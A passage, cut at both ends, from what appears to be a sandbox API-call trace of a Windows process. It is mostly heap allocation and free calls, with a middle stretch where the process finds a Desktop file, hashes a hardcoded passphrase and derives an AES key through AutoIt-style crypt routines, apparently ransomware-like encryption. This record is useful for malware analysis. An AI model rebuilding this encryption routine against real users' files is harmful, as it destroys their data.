hHeap=0x1780000) returned 1 [0122.674] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.675] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.675] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.676] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0122.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.678] CloseHandle (hObject=0x2a0) returned 1 [0122.678] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.678] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.678] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1321e690, ftCreationTime.dwHighDateTime=0x1d5eccc, ftLastAccessTime.dwLowDateTime=0x4cc2b900, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0x4cc2b900, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0x17903, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="CtmEppS 7Ks0.swf", cAlternateFileName="CTMEPP~1.SWF")) returned 0x41ac640 [0122.678] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0122.679] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797008, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.679] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.680] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.680] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.680] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.680] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.680] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.681] CryptHashData (hHash=0x41ac540, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.681] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca9e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.681] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac6c0) returned 1 [0122.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.681] CryptDestroyHash (hHash=0x41ac540) returned 1 [0122.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0122.682] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.682] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.683] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 